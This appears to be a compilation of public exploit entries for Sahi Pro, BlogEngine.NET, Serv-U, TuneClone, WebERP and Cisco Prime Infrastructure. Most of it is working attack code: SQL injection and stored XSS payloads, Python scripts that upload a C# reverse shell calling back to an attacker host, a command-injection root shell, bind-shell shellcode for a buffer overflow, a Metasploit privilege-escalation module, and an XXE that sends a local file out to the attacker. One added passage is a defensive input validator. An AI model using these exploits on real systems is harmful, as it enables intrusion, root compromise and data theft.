''' replace the ip and port of the remote sahi pro server machine '''
# Here the SQL query is passed directly as part of the GET request, so it can be modified to run standard h2 database functions. In the following POC the "memory_used()" function is injected; its result is reflected in the "status" column of the reports page.
http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS
-
Sahi pro 8.x - Cross-Site Scripting
# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20472
# POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/

DESCRIPTION :
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. The Description parameter of the Testcase API can be used to exploit the stored XSS.

POC :
Step 1 : create a Sahi test automation script with the following content and save the file with the ".sah" extension ( example : poc.sah ) :

var $tc1 = _testcase("TC-1", "<script>alert(document.cookie)</script>").start();
_log("testing stored XSS injection");
$tc1.end();

Step 2 : Execute the created script ( poc.sah ) using the Sahi GUI controller.
Step 3 : Navigate to the web logs console ( http://<ip>:<port>/logs ) in the browser for the executed script. The XSS is triggered.
-
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution
# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10720

#1. Description
#==============
#BlogEngine.NET is vulnerable to a Directory Traversal through the **theme** cookie which triggers a RCE.

#2. Proof of Concept
#=============
#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`:
#~~~
#POST /api/upload?action=filemgr HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085
#
#-----------------------------12143974373743678091868871063
#Content-Disposition: form-data; filename="PostView.ascx"
#
#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>
#<script runat="server">
#static System.IO.StreamWriter streamWriter;
#    protected override void OnLoad(EventArgs e) {
#        base.OnLoad(e);
#        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#            using(System.IO.Stream stream = client.GetStream()) {
#                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#                    streamWriter = new System.IO.StreamWriter(stream);
#                    StringBuilder strInput = new StringBuilder();
#                    System.Diagnostics.Process p = new System.Diagnostics.Process();
#                    p.StartInfo.FileName = "cmd.exe";
#                    p.StartInfo.CreateNoWindow = true;
#                    p.StartInfo.UseShellExecute = false;
#                    p.StartInfo.RedirectStandardOutput = true;
#                    p.StartInfo.RedirectStandardInput = true;
#                    p.StartInfo.RedirectStandardError = true;
#                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#                    p.Start();
#                    p.BeginOutputReadLine();
#                    while(true) {
#                        strInput.Append(rdr.ReadLine());
#                        p.StandardInput.WriteLine(strInput);
#                        strInput.Remove(0, strInput.Length);
#                    }
#                }
#            }
#        }
#    }
#    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
#        StringBuilder strOutput = new StringBuilder();
#        if (!String.IsNullOrEmpty(outLine.Data)) {
#            try {
#                strOutput.Append(outLine.Data);
#                streamWriter.WriteLine(strOutput);
#                streamWriter.Flush();
#            } catch (Exception err) { }
#        }
#    }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
#-----------------------------12143974373743678091868871063--
#~~~
#Trigger the RCE by setting the **theme** cookie to **../../App_Data/files/2019/06/** and browsing to any page on the application; authentication is not required to trigger the RCE.
#=================================

import argparse
import io
import json
import os
import re
import requests
import sys

"""
Exploit for CVE-2019-10719
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Upload and trigger a reverse shell
python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337

Open a listener to capture the reverse shell - Metasploit or netcat
nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
"""

urls = {
    "login": "/Account/login.aspx",
    "traversal": "/api/filemanager"
}


def make_request(session, method, target, params={}, data={}, files={}):
    proxies = {
        "http": "127.0.0.1:8080",
        "https": "127.0.0.1:8080"
    }
    if method == 'GET':
        r = requests.Request(method, target, params=params)
    elif method == 'POST':
        if files:
            r = requests.Request(method, target, files=files)
        else:
            r = requests.Request(method, target, data=data)
    prep = session.prepare_request(r)
    resp = session.send(prep, verify=False, proxies=proxies)
    return resp.text


def login(session, host, user, passwd):
    resp = make_request(session, 'GET', host + urls.get('login'))
    login_form = re.findall(r'<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
    login_data = dict([(i[0], i[2]) for i in login_form])
    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
    resp = make_request(session, 'POST', host + urls.get('login'), data=login_data)


def upload_shell(session, target, listener):
    try:
        lhost, lport = listener.split(':')
    except:
        print(target, " is not in the correct HOST:PORT format")
        sys.exit(1)
    shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
            using(System.IO.Stream stream = client.GetStream()) {
                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);
                    StringBuilder strInput = new StringBuilder();
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();
                    while(true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();
        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
    make_request(session, "POST", target + "/api/upload?action=filemgr",
                 files={"file": ("PostView.ascx", shell, "application/octet-stream")})


def trigger_shell(session, target):
    import datetime
    now = datetime.datetime.now().strftime("%Y/%m/")
    requests.get(target + "/", cookies={"theme": "../../App_Data/files/{}".format(now)})


def main(target, user, passwd, listener):
    with requests.Session() as session:
        login(session, target, user, passwd)
        upload_shell(session, target, listener)
        trigger_shell(session, target)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10720 Path traversal + RCE')
    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
    parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
    args = parser.parse_args()
    protocol = "https://" if args.ssl else "http://"
    main(protocol + args.target, args.user, args.passwd, args.listener)
-
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by: Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}
-
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution
# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10719

#1. Description
#==============
#BlogEngine.NET is vulnerable to a Directory Traversal on `/api/upload` which allows a RCE through the `theme` parameter.

#2. Proof of Concept
#=============
#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`; exploit the directory traversal to upload the shell into the **/Custom/Themes**
#directory:
#~~~
#POST /api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085
#
#-----------------------------12143974373743678091868871063
#Content-Disposition: form-data; filename="PostView.ascx"
#
#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>
#<script runat="server">
#static System.IO.StreamWriter streamWriter;
#    protected override void OnLoad(EventArgs e) {
#        base.OnLoad(e);
#        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#            using(System.IO.Stream stream = client.GetStream()) {
#                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#                    streamWriter = new System.IO.StreamWriter(stream);
#                    StringBuilder strInput = new StringBuilder();
#                    System.Diagnostics.Process p = new System.Diagnostics.Process();
#                    p.StartInfo.FileName = "cmd.exe";
#                    p.StartInfo.CreateNoWindow = true;
#                    p.StartInfo.UseShellExecute = false;
#                    p.StartInfo.RedirectStandardOutput = true;
#                    p.StartInfo.RedirectStandardInput = true;
#                    p.StartInfo.RedirectStandardError = true;
#                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#                    p.Start();
#                    p.BeginOutputReadLine();
#                    while(true) {
#                        strInput.Append(rdr.ReadLine());
#                        p.StandardInput.WriteLine(strInput);
#                        strInput.Remove(0, strInput.Length);
#                    }
#                }
#            }
#        }
#    }
#    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
#        StringBuilder strOutput = new StringBuilder();
#        if (!String.IsNullOrEmpty(outLine.Data)) {
#            try {
#                strOutput.Append(outLine.Data);
#                streamWriter.WriteLine(strOutput);
#                streamWriter.Flush();
#            } catch (Exception err) { }
#        }
#    }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
#-----------------------------12143974373743678091868871063--
#~~~
#The RCE can be triggered by setting the **theme** parameter to **RCE_TEST**: $RHOST/?theme=RCE_Test
#==============================

import argparse
import io
import json
import os
import re
import requests
import sys

"""
Exploit for CVE-2019-10719
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Upload and trigger a reverse shell
python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337

Open a listener to capture the reverse shell - Metasploit or netcat
nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
"""

urls = {
    "login": "/Account/login.aspx",
    "traversal": "/api/filemanager"
}


def make_request(session, method, target, params={}, data={}, files={}):
    proxies = {
        "http": "127.0.0.1:8080",
        "https": "127.0.0.1:8080"
    }
    if method == 'GET':
        r = requests.Request(method, target, params=params)
    elif method == 'POST':
        if files:
            r = requests.Request(method, target, files=files)
        else:
            r = requests.Request(method, target, data=data)
    prep = session.prepare_request(r)
    resp = session.send(prep, verify=False, proxies=proxies)
    return resp.text


def login(session, host, user, passwd):
    resp = make_request(session, 'GET', host + urls.get('login'))
    login_form = re.findall(r'<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
    login_data = dict([(i[0], i[2]) for i in login_form])
    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
    resp = make_request(session, 'POST', host + urls.get('login'), data=login_data)


def upload_shell(session, target, shell_dir, listener):
    try:
        lhost, lport = listener.split(':')
    except:
        print(target, " is not in the correct HOST:PORT format")
        sys.exit(1)
    shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
            using(System.IO.Stream stream = client.GetStream()) {
                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);
                    StringBuilder strInput = new StringBuilder();
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();
                    while(true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();
        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
    make_request(session, "POST",
                 target + "/api/upload?action=filemgr&dirPath=~/App_Data/files/../../Custom/Themes/" + shell_dir,
                 files={"file": ("PostView.ascx", shell, "application/octet-stream")})


def trigger_shell(session, target, shell_dir):
    make_request(session, "GET", target + "/", params={"theme": shell_dir})


def main(target, user, passwd, shell_dir, listener):
    with requests.Session() as session:
        login(session, target, user, passwd)
        upload_shell(session, target, shell_dir, listener)
        trigger_shell(session, target, shell_dir)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10719 Path traversal + RCE')
    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
    parser.add_argument('-d', '--dir', nargs='?', default="RCE", help='Theme Directory to write Reverse shell to')
    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
    parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
    args = parser.parse_args()
    protocol = "https://" if args.ssl else "http://"
    main(protocol + args.target, args.user, args.passwd, args.dir, args.listener)
-
Tuneclone 2.20 - Local SEH Buffer Overflow
# Exploit Title: TuneClone Local Seh Exploit
# Date: 19.06.2019
# Vendor Homepage: http://www.tuneclone.com/
# Software Link: http://www.tuneclone.com/tuneclone_setup.exe
# Exploit Author: Achilles
# Tested Version: 2.20
# Tested on: Windows XP SP3 EN
# 1.- Run python code : TuneClone.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open TuneClone and press Help and 'Enter License Code'
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK' and you will have a bind shell port 3110.
# 6.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python
import struct

buffer = "\x41" * 1056
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x583411c0) #msaud32.acm
nops = "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")

pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
payload = buffer + nseh + seh + nops + shellcode + pad

try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
WebERP 4.15 - SQL injection
# Exploit Title: Blind SQL injection in WebERP.
# Date: June 10, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: http://www.weberp.org/
# Version: 4.15

# A malicious query can be sent in base64 encoding to the unserialize() function. It can be deserialized as an array without any sanitization.
# After that, each element of the array is passed directly to the SQL query.

import requests
import base64
import os
import subprocess
from bs4 import BeautifulSoup
import re
import time
import sys

def generatePayload(PaidAmount="0",PaymentId="0"):
    #THIS FUNCTION IS INSECURE BY DESIGN
    ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount)
    return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read()

def getCookies(ip, CompanyNameField, usr, pwd):
    r = requests.get("http://" + ip + "/index.php")
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"}
    r = requests.post("http://" + ip + "/index.php", data)
    return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]}

def addSupplierID(name, cookies, proxies):
    r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019",
            "BankPartics":"","BankRef":"0","PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD",
            "Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"}
    requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies)

def runExploit(cookies, supplier_id, payload, proxies):
    r = requests.get("http://" + ip + "/Payments.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    data = {"FormID":FormID, "CommitBatch":"2", "BankAccount":"1", "DatePaid":"01/06/2019", "PaidArray":payload}
    requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies)

if __name__ == "__main__":
    #proxies = {'http':'127.0.0.1:8080'}
    proxies = {}
    if len(sys.argv) != 6:
        print '(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0]
        print '(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0]
        print 'Order means the number of company on the website. Can be gathered from the login page and usually equals 0 or 1'
        exit()
    ip = sys.argv[1] + "/" + sys.argv[2]
    #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30=
    #payload = generatePayload("0 where sleep(1)=1;-- -", "0")
    payload = generatePayload("0", "' or sleep(5) and '1'='1")
    #get cookies
    cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4])
    addSupplierID("GARUMPAGE", cookies, proxies)
    t1 = time.time()
    runExploit(cookies, "GARUMPAGE", payload, proxies)
    t2 = time.time()
    if (t2-t1>4):
        print "Blind sqli is confirmed"
    else:
        print "Verify input data and try again"
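As an added defender's example (not from the advisory and not WebERP's own PHP code): the validation the Payments.php handler needs before any PaidArray element reaches SQL. It base64-decodes the parameter, parses the serialized PHP array with a minimal parser for the a:/i:/d:/s: subset, and accepts a row only when both key and value are numeric; the benign sample value and the numeric-only policy are assumptions, the rejected payload is the one quoted in the advisory.

```python
import base64
import re

_NUM = re.compile(r'^-?\d+(\.\d+)?$')  # assumed policy: PaymentId/PaidAmount are plain decimals

# Advisory's payload: decodes to a:1:{i:0;s:23:"0 where sleep(1)=1;-- -";}
PAGE_PAYLOAD_B64 = "YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30="
# Constructed benign sample: a:1:{i:7;s:6:"125.50";}
BENIGN_B64 = "YToxOntpOjc7czo2OiIxMjUuNTAiO30="


def php_unserialize_array(data):
    """Parse a:N:{...} with i:/d:/s: scalars into [(key, value)] str pairs.
    Anything else (nested arrays, O: objects) raises ValueError."""
    if not data.startswith(b'a:'):
        raise ValueError('not a serialized array')
    count_end = data.index(b':', 2)
    count = int(data[2:count_end].decode())
    pos = count_end + 2  # skip ':{'

    def scalar(pos):
        kind = data[pos:pos + 1]
        if kind in (b'i', b'd'):  # i:123;  d:1.5;
            end = data.index(b';', pos)
            return data[pos + 2:end].decode(), end + 1
        if kind == b's':  # s:LEN:"bytes";  LEN is a byte count
            len_end = data.index(b':', pos + 2)
            length = int(data[pos + 2:len_end].decode())
            start = len_end + 2
            if data[start + length:start + length + 2] != b'";':
                raise ValueError('bad string length')
            return data[start:start + length].decode(), start + length + 2
        raise ValueError('unsupported type %r' % kind)

    items = []
    for _ in range(count):
        key, pos = scalar(pos)
        value, pos = scalar(pos)
        items.append((key, value))
    if data[pos:pos + 1] != b'}':
        raise ValueError('trailing data')
    return items


def validate_paid_array(b64):
    """[(payment_id, amount), ...] if every field is numeric, else None."""
    try:
        items = php_unserialize_array(base64.b64decode(b64))
    except ValueError:  # covers bad base64, truncation and decode errors
        return None
    return items if all(_NUM.match(k) and _NUM.match(v) for k, v in items) else None
```

Returning None on any parse failure keeps malformed input out of the query path entirely, which is the property unserialize() on its own does not give.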
-
Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super( update_info( info,
      'Name'           => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary.
        The runrshell binary is meant to execute a shell script as root, but can be abused to
        inject extra commands in the argument, allowing you to execute anything as root.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery
          'sinn3r'                               # Metasploit module
        ],
      'Platform'       => ['linux'],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'DisclosureDate' => '2018-12-08',
      'Privileged'     => true,
      'References'     =>
        [
          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],
        ],
      'Targets'        =>
        [
          [ 'Cisco Prime Infrastructure 3.4.0', {} ]
        ],
      'DefaultTarget'  => 0
    ))

    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])
    ]
  end

  def exec_as_root(cmd)
    command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'"
    vprint_status(cmd_exec(command_string))
  end

  def exploit
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"
    exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)

    print_status("Uploading #{exe_path}")
    write_file(exe_path, generate_payload_exe)

    unless file?(exe_path)
      print_error("Failed to upload #{exe_path}")
      return
    end

    register_file_for_cleanup(exe_path)

    print_status('chmod the file with +x')
    exec_as_root("/bin/chmod +x #{exe_path}")

    print_status("Executing #{exe_path}")
    exec_as_root(exe_path)
  end
end
-
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection
# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET
# Date: 19 June 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10718

#1. Description
#==============
#BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity
#Injection attack on **/pingback.axd**.

#2. Proof of Concept
#=============
#Host the following malicious DTD on a web server that is accessible to the
#target system:
#~~~
#<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini">
#<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2
#~~~
#Submit a request to `pingback.axd` containing a malicious XML body:
#~~~{command="REQUEST"}
#POST /pingback.axd HTTP/1.1
#Host: $RHOST
#Accept-Encoding: gzip, deflate
#Connection: close
#User-Agent: python-requests/2.12.4
#Accept: */*
#Content-Type: text/xml
#Content-Length: 131
#
#<?xml version="1.0"?>
#<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd">
#<foo>&e1;</foo>
#<methodName>pingback.ping</methodName>
#~~~
